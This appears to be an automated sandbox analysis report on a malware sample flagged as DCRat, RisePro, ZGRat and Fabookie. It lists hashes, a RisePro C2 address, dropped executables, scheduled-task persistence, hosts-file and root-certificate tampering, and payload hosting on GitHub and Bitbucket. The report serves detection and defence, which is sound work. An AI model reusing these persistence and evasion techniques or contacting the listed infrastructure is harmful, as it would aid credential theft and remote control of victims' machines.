dcrat | 0c951f58a23cd2c9bdccb727d41e33e740344af36d91419907ce016977b2a62d

max time kernel
69s
max time network
2346s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
09-02-2024 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

dcrat fabookie risepro zgrat discovery infostealer rat spyware stealer

Malware Config

Extracted

Family

risepro

193.233.132.62

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Fabookie payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2996-391-0x00000000031F0000-0x000000000331C000-memory.dmp	family_fabookie
behavioral1/memory/2996-416-0x00000000031F0000-0x000000000331C000-memory.dmp	family_fabookie
behavioral1/memory/2996-391-0x00000000031F0000-0x000000000331C000-memory.dmp	family_fabookie
behavioral1/memory/2996-416-0x00000000031F0000-0x000000000331C000-memory.dmp	family_fabookie

Detect ZGRat V1 64 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1656-158-0x0000000004B90000-0x0000000004D98000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-167-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-168-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-170-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-172-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-174-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-177-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-179-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-181-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-183-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-194-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-196-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-198-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-200-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-202-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-204-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-206-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-208-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-210-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-214-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-224-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-222-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-216-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-228-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-226-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-241-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-239-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-237-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-235-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-232-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-230-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-253-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-251-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-243-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	family_zgrat_v1
behavioral1/memory/1656-158-0x0000000004B90000-0x0000000004D98000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-167-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-168-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-170-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-172-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-174-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-177-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-179-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-181-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-183-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-194-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-196-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-198-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-200-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-202-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-204-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-206-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-208-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-210-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-214-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-224-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-222-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-216-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-228-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-226-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-241-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-239-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-237-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1
behavioral1/memory/1656-235-0x0000000004B90000-0x0000000004D93000-memory.dmp	family_zgrat_v1

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie

Process spawned unexpected child process 30 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2408	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2400	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	904	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	616	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	544	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1644	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2408	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2400	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1528	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	904	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	616	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	544	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	2392	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2312	2392	schtasks.exe

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/1836-356-0x0000000000CB0000-0x0000000000E76000-memory.dmp	dcrat
behavioral1/memory/1836-356-0x0000000000CB0000-0x0000000000E76000-memory.dmp	dcrat

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

comSvc.execomSvc.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	comSvc.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	comSvc.exe

Executes dropped EXE 18 IoCs

Processes:

abtc8mhlbehqil.exeghjkl.exefund.exedota.exePresentationFontCache.exePresentationFontCache.exerty47.execomSvc.exeabtc8mhlbehqil.exeghjkl.exefund.exedota.exePresentationFontCache.exePresentationFontCache.exerty47.execomSvc.exe

pid	process
2796	abtc8mhlbehqil.exe
1656	ghjkl.exe
440	fund.exe
1844	dota.exe
1252	PresentationFontCache.exe
2080	PresentationFontCache.exe
2996	rty47.exe
1836	comSvc.exe
1224
2796	abtc8mhlbehqil.exe
1656	ghjkl.exe
440	fund.exe
1844	dota.exe
1252	PresentationFontCache.exe
2080	PresentationFontCache.exe
2996	rty47.exe
1836	comSvc.exe
1224

Loads dropped DLL 22 IoCs

Processes:

4363463463464363463463463.exePresentationFontCache.exePresentationFontCache.execmd.exe4363463463464363463463463.exePresentationFontCache.exePresentationFontCache.execmd.exe

pid	process
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1252	PresentationFontCache.exe
2080	PresentationFontCache.exe
1712	4363463463464363463463463.exe
1548	cmd.exe
1548	cmd.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1712	4363463463464363463463463.exe
1252	PresentationFontCache.exe
2080	PresentationFontCache.exe
1712	4363463463464363463463463.exe
1548	cmd.exe
1548	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 45.155.250.90
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

description	ioc
Destination IP	45.155.250.90

Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs

Web Service

T1102

Processes:

flow	ioc
5082	bitbucket.org
270	raw.githubusercontent.com
378	raw.githubusercontent.com
369	bitbucket.org
842	raw.githubusercontent.com
4866	raw.githubusercontent.com
368	bitbucket.org
4377	raw.githubusercontent.com
5061	bitbucket.org
23	raw.githubusercontent.com
269	raw.githubusercontent.com
24	raw.githubusercontent.com
3349	raw.githubusercontent.com
2302	raw.githubusercontent.com
3685	bitbucket.org
4378	raw.githubusercontent.com
1054	bitbucket.org
1976	bitbucket.org
18	bitbucket.org
19	bitbucket.org
365	raw.githubusercontent.com
3703	bitbucket.org
5339	raw.githubusercontent.com
5730	raw.githubusercontent.com
1051	bitbucket.org
1977	bitbucket.org

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
43	ipinfo.io
910	ip-api.com
41	ipinfo.io
1686	ip-api.com
95	ipinfo.io
345	api.ipify.org
1507	ip-api.com
3101	api.ipify.org
94	ipinfo.io
100	ipinfo.io
347	api.ipify.org
2349	api.ipify.org
3023	api.ipify.org

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\ZV7eVaE21uid5jxWl7NM.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\ZV7eVaE21uid5jxWl7NM.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

dota.exedota.exe

pid process

1844 dota.exe
1844 dota.exe
1844 dota.exe
1844 dota.exe
1844 dota.exe
1844 dota.exe

pid	process
1844	dota.exe
1844	dota.exe
1844	dota.exe
1844	dota.exe
1844	dota.exe
1844	dota.exe

Drops file in Program Files directory 10 IoCs

Processes:

comSvc.execomSvc.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX36FC.tmp	comSvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe	comSvc.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe	comSvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX36FD.tmp	comSvc.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\6203df4a6bafc7	comSvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX36FD.tmp	comSvc.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\6203df4a6bafc7	comSvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX36FC.tmp	comSvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe	comSvc.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe	comSvc.exe

Drops file in Windows directory 10 IoCs

Processes:

comSvc.execomSvc.exe

description	ioc	process
File opened for modification	C:\Windows\security\templates\sppsvc.exe	comSvc.exe
File created	C:\Windows\security\templates\sppsvc.exe	comSvc.exe
File opened for modification	C:\Windows\security\templates\RCX3D49.tmp	comSvc.exe
File created	C:\Windows\security\templates\sppsvc.exe	comSvc.exe
File created	C:\Windows\security\templates\0a1fd5f707cd16	comSvc.exe
File opened for modification	C:\Windows\security\templates\RCX3D49.tmp	comSvc.exe
File opened for modification	C:\Windows\security\templates\RCX3D4A.tmp	comSvc.exe
File created	C:\Windows\security\templates\0a1fd5f707cd16	comSvc.exe
File opened for modification	C:\Windows\security\templates\RCX3D4A.tmp	comSvc.exe
File opened for modification	C:\Windows\security\templates\sppsvc.exe	comSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3384	3968	WerFault.exe	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
2968	4736	WerFault.exe	gold1201001.exe
3384	3968	WerFault.exe	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
2968	4736	WerFault.exe	gold1201001.exe

Creates scheduled task(s) 1 TTPs 40 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	process
2408	schtasks.exe
3044	schtasks.exe
2256	schtasks.exe
4424	schtasks.exe
3020	schtasks.exe
1644	schtasks.exe
1772	schtasks.exe
1644	schtasks.exe
2312	schtasks.exe
904	schtasks.exe
4440	schtasks.exe
3020	schtasks.exe
544	schtasks.exe
2888	schtasks.exe
4440	schtasks.exe
2400	schtasks.exe
2256	schtasks.exe
616	schtasks.exe
1528	schtasks.exe
2276	schtasks.exe
2276	schtasks.exe
3044	schtasks.exe
2312	schtasks.exe
1248	schtasks.exe
1948	schtasks.exe
904	schtasks.exe
1948	schtasks.exe
616	schtasks.exe
1364	schtasks.exe
1248	schtasks.exe
1248	schtasks.exe
2408	schtasks.exe
544	schtasks.exe
2888	schtasks.exe
1772	schtasks.exe
1248	schtasks.exe
1528	schtasks.exe
1364	schtasks.exe
4424	schtasks.exe
2400	schtasks.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

2584 timeout.exe
4876 timeout.exe
2584 timeout.exe
4876 timeout.exe

pid	process
2584	timeout.exe
4876	timeout.exe
2584	timeout.exe
4876	timeout.exe

Modifies system certificate store 2 TTPs 22 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

4363463463464363463463463.exe4363463463464363463463463.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b